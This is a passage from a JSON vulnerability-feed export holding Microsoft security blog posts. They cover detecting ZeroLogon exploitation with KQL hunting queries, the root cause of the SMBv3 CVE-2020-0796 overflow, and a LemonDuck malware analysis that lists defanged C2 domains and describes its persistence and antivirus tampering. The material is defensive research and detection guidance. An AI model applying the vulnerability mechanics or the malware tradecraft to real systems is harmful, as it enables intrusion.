"2022-08-16T05:00:49", "id": "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "href": "https://www.hivepro.com/vulnerabilities-threats-that-matter-08-14th-aug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-12-02T21:36:53", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. 
[Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>), along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions, detects adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even though we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we observed a surge in alerts. 
This increase in activity coincided with the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both exploitation attempts and traffic inspection of the Netlogon channel.\n\n\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>). This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. 
In many cases, it was clear that the activity originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controllers at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to remotely exploit unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoint.\n\n\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. 
It constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind the scenes to combine alerts, reducing security operations center (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the Netlogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where 
isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \n// The alert time is taken from the same NLEvidence table defined above \nlet alertTime = todatetime(toscalar(NLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. 
This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or by an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability.\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from [the threat analytics article](<https://securitycenter.windows.com/threatanalytics3/c57607da-fb94-43f3-b8ba-1acda0242900/analystreport>) available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? 
Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>) for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-30T17:00:20", "type": "mssecure", "title": "Zerologon is now detected by Microsoft Defender for Identity", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2020-11-30T17:00:20", "id": "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-05T21:38:22", "description": "The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it\u2019s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.\n\nTo help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. 
We do this by:\n\n * Building security early into the design of features.\n * Developing tools and processes that proactively find vulnerabilities in code.\n * Introducing mitigations into Windows that make bugs significantly harder to exploit.\n * Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.\n\nThis proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.\n\n### Proactive security to prevent the next WannaCry\n\nIn the past few years, much of our team\u2019s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. 
Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or lead to ransomware outbreaks like WannaCry: [CVE-2019-1181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181>) and [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182>), dubbed \"[DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>)\", [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1226>) (RCE in RDP Server), [CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) (RCE in RDP Client), and [CVE-2019-0787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0787>) (RCE in RDP client), among others.\n\nOne of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving: 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well as proactively drive security into Windows.\n\nLike many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we\u2019ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. 
One such vulnerability is the remote code execution (RCE) vulnerability in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) on March 12, 2020.\n\nIn the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations against exploitation.\n\n### Fully deterministic person-in-the-middle fuzzing\n\nWe use a custom deterministic full system emulator tool we call \u201cTKO\u201d to fuzz and introspect Windows components. TKO provides the capability to perform full system emulation and memory snapshotting, as well as other innovations. As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:\n\n * The ability to snapshot and fuzz forward from any program state.\n * Efficiently restoring to the initial state for fast iteration.\n * Collecting complete code coverage across all processes.\n * Leveraging greater introspection into the system without too much perturbation.\n\nWhile all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston\u2019s recent BlueHat IL presentation \u201c[Keeping Windows secure](<https://www.youtube.com/watch?v=NlfZG2wTPZU>)\u201d, which touches on fuzzing, as well as the TKO tool and infrastructure.\n\n### Fuzzing SMB\n\nGiven the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO\u2019s new capabilities and functionalities made it worthwhile to revisit the codebase. 
Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.\n\nAfter performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol\u2019s state space, we had the information we needed to start fuzzing.\n\nWe used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol\u2019s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.\n\nWe began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.\n\n\n\n_Figure 1. TKO fuzzing workflow_\n\nA short time later, we came back to some compelling results. Replaying the first crashing input with TKO\u2019s kdnet plugin revealed the following stack trace:\n \n \n _> tkofuzz.exe repro inputs\\crash_6a492.txt -- kdnet:conn 127.0.0.1:50002_\n\n\n\n_Figure 2. 
Windbg stack trace of crash_\n\nWe found an access violation in _srv2!Smb2CompressionDecompress_.\n\n### Finding the root cause of the crash\n\nWhile the stack trace suggested that a vulnerability exists in the decompression routine, it\u2019s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has _\u2018\\xfcSMB\u2019_ set as the first bytes in its header, making it a [COMPRESSION_TRANSFORM](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0>) packet.\n\n\n\n_Figure 3. COMPRESSION_TRANSFORM packet details_\n\nThe SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.\n \n \n typedef struct _COMPRESSION_TRANSFORM_HEADER\n {\n     UCHAR  Protocol[4];          // Contains 0xFC, 'S', 'M', 'B'\n     ULONG  OriginalMessageSize;  // Expected size after decompression\n     USHORT AlgorithmId;\n     USHORT Flags;\n     ULONG  Length;               // Offset of the compressed bytes in the packet\n } COMPRESSION_TRANSFORM_HEADER;\n\nIn _srv2!Srv2DecompressData_, shown in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine pointers being passed to _srv2!SMBCompressionDecompress_.\n\n\n\n_Figure 4. Srv2DecompressData graph_\n\nWe can see that at _0x7e94_, _rax_ points to our network buffer, and the buffer is copied to the stack before the _OriginalCompressedSegmentSize_ and _Length_ are parsed out and added together at _0x7ED7_ to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results outside the bounds of the destination _SrvNet_ buffer, in an out-of-bounds write (OOBW).\n\n\n\n_Figure 5. 
Overflow condition_\n\nLooking further, we can see that the _Length_ field is parsed into _esi_ at _0x7F04_, added to the network buffer pointer, and passed to _CompressionDecompress_ as the source pointer. As _Length_ is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this _Length_ to be greater than the packet length also causes the computed source buffer length passed to _SmbCompressionDecompress_ to underflow at _0x7F18_, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.\n\n\n\n_Figure 6. Underflow condition_\n\n### Windows 10 mitigations against remote network vulnerabilities\n\nOur discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.\n\nFor example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). 
Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 [pool hardening helps mitigate](<https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#kernel-pool-protections>) this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.\n\nAssuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If [virtualization-based security (VBS)](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.\n\nOn [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default. Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. 
Along with [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), Secured-core PCs provide end-to-end protection against advanced threats.\n\nWhile these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.\n\n \n\nThe post [Mitigating vulnerabilities in endpoint network stacks](<https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-04T16:00:25", "type": "mssecure", "title": "Mitigating vulnerabilities in endpoint network stacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0787", "CVE-2019-1181", "CVE-2019-1182", "CVE-2019-1226", "CVE-2020-0611", "CVE-2020-0796"], "modified": "2020-05-04T16:00:25", "id": "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "href": 
"https://www.microsoft.com/security/blog/2020/05/04/mitigating-vulnerabilities-endpoint-network-stacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. 
These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) blocks the real-time monitoring change, but exclusion additions are not covered by it (as the hunting query for this behavior notes below), so it\u2019s important for organizations to monitor this behavior, especially in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and Malwarebytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d or \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously generated random, non-existent domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
